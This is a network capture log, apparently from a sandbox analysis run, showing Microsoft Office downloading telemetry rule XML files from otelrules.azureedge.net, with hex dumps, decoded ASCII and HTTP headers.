                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        20192.168.2.44978013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:25 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:26 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:25 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 2160
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                        ETag: "0x8DC582BA3B95D81"
                                                                        x-ms-request-id: d2130280-a01e-006f-03c7-4313cd000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165025Z-174f78459684bddphC1EWRbht400000015xg00000000gg47
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:26 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        21192.168.2.44977713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:25 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:26 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:25 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 450
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                        ETag: "0x8DC582BD4C869AE"
                                                                        x-ms-request-id: e0d2e361-601e-00ab-06d4-4366f4000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165025Z-174f7845968xlwnmhC1EWR0sv800000015x000000000v2fb
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:26 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        22192.168.2.44977913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:25 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:26 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:25 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 408
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                        x-ms-request-id: 2c78b3d6-001e-0017-21e0-430c3c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165025Z-174f7845968px8v7hC1EWR08ng00000016h0000000004zw6
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:26 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        23192.168.2.44977613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:25 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:26 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:26 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 3788
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                        ETag: "0x8DC582BAC2126A6"
                                                                        x-ms-request-id: e6e3c96a-a01e-0032-07d4-431949000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165025Z-174f7845968frfdmhC1EWRxxbw000000164000000000vxsb
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:26 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        24192.168.2.44977813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:25 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:26 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:25 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 2980
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                        ETag: "0x8DC582BA80D96A1"
                                                                        x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165025Z-174f7845968kdththC1EWRzvxn0000000kdg00000000xk25
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:26 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        25192.168.2.44978113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:27 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:28 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:28 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 474
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                        ETag: "0x8DC582B9964B277"
                                                                        x-ms-request-id: 03f3685a-b01e-0097-2663-444f33000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165028Z-174f7845968frfdmhC1EWRxxbw0000001690000000009z8f
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:28 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        26192.168.2.44978213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:27 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:28 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:28 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 415
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                        ETag: "0x8DC582B9F6F3512"
                                                                        x-ms-request-id: 896d1f20-701e-0001-29ee-44b110000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165028Z-174f7845968cs2nkhC1EWR2tq000000001wg00000000d29w
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
